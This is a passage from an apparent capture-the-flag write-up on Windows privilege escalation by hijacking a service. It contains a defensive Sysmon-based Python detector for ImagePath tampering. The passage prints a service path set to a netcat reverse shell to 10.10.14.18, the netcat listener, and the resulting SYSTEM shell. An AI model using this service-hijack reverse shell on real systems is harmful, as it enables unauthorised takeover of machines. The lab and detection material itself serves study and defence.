ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Windows\Temp\nc64.exe -e cmd 10.10.14.18 443
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : VMware Tools
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
*Evil-WinRM* PS C:\Windows\Temp>
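From the defender's side, the change that `sc.exe qc` confirms above is a registry write to the service's ImagePath value, which Sysmon records as Event ID 13 (RegistryEvent, value set) on HKLM\System\CurrentControlSet\Services\<name>\ImagePath. Below is an added Python detector, not part of the writeup, that compares such events against a baseline taken from the `services` listing above and flags a service whose executable leaves the baseline or lands in a user-writable directory; the events are constructed dicts standing in for parsed Sysmon records, and the writable-directory list is an assumption.

```python
"""Flag service ImagePath changes recorded as Sysmon Event ID 13 (registry
value set). Added example for this writeup; the events are constructed."""
import re

# Baseline copied from the `services` listing in this writeup (name -> executable).
BASELINE = {
    "ADWS": r"C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe",
    "VMTools": r"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe",
    "WinDefend": r"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\MsMpEng.exe",
}

# Directories a low-privileged account can normally write to (assumed list).
WRITABLE_PREFIXES = ("c:\\windows\\temp\\", "c:\\users\\", "c:\\temp\\", "c:\\windows\\tasks\\")

IMAGEPATH_RE = re.compile(
    r"^HKLM\\SYSTEM\\(?:CurrentControlSet|ControlSet\d{3})\\Services\\([^\\]+)\\ImagePath$",
    re.IGNORECASE)


def executable_of(image_path: str) -> str:
    """Extract the program from a service command line (quoted or unquoted)."""
    p = image_path.strip()
    if p.startswith("\\??\\"):               # NT object path prefix used by drivers
        p = p[4:]
    if p.startswith('"'):
        return p[1:p.index('"', 1)]
    m = re.match(r"^(.*?\.(?:exe|sys|dll))(?:\s|$)", p, re.IGNORECASE)
    return m.group(1) if m else (p.split() or [""])[0]


def check_event(event: dict):
    """Return the reasons this registry-set event looks like service tampering."""
    if event.get("EventID") != 13:
        return []
    m = IMAGEPATH_RE.match(event.get("TargetObject", ""))
    if not m:
        return []
    service = m.group(1)
    exe = executable_of(event.get("Details", ""))
    reasons = []
    if service in BASELINE and exe.lower() != BASELINE[service].lower():
        reasons.append(f"{service}: ImagePath left baseline ({BASELINE[service]} -> {exe})")
    if exe.lower().startswith(WRITABLE_PREFIXES):
        reasons.append(f"{service}: executable in user-writable directory ({exe})")
    return reasons


def scan(events):
    """Run check_event over a stream of parsed Sysmon records."""
    return [reason for event in events for reason in check_event(event)]


# Constructed Sysmon-style records: the VMTools change from this writeup, a benign
# Defender platform update that keeps its executable in place, and an unrelated event.
EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\System32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\VMTools\ImagePath",
     "Details": r"C:\Windows\Temp\nc64.exe -e cmd 10.10.14.18 443"},
    {"EventID": 13, "Image": r"C:\Windows\System32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\WinDefend\ImagePath",
     "Details": r'"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\MsMpEng.exe"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": "sc.exe qc VMTools"},
]

if __name__ == "__main__":
    for alert in scan(EVENTS):
        print("ALERT", alert)
```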
Now we stop the service
*Evil-WinRM* PS C:\Windows\Temp> sc.exe stop VMTools
SERVICE_NAME: VMTools
TYPE : 10 WIN32_OWN_PROCESS
STATE : 1 STOPPED
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
and before starting it again we set our machine listening on the port we configured.
┌─[root@angussmoody]─[/mnt/angussMoody/Machines/Return]
└──╼ #nc -nlvp 443
Listening on 0.0.0.0 443
Once our machine is listening, we can start the service; the command hangs while the binary runs.
*Evil-WinRM* PS C:\Windows\Temp> sc.exe start VMTools
and on our attacking machine we now have our reverse shell as administrator.
┌─[root@angussmoody]─[/mnt/angussMoody/Machines/Return]
└──╼ #nc -nlvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.108 51060
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
With this reverse shell we can go to the Administrator's directory and read our second flag.
┌─[root@angussmoody]─[/mnt/angussMoody/Machines/Return]
└──╼ #nc -nlvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.108 51073
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd c:\Users\Administrator\Desktop
cd c:\Users\Administrator\Desktop
c:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 3A0C-428E
Directory of c:\Users\Administrator\Desktop
09/27/2021 04:22 AM <DIR> .
09/27/2021 04:22 AM <DIR> ..
08/08/2022 04:25 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 8,600,281,088 bytes free
c:\Users\Administrator\Desktop>type root.txt
type root.txt
6bb6a0*******************ea4923
c:\Users\Administrator\Desktop>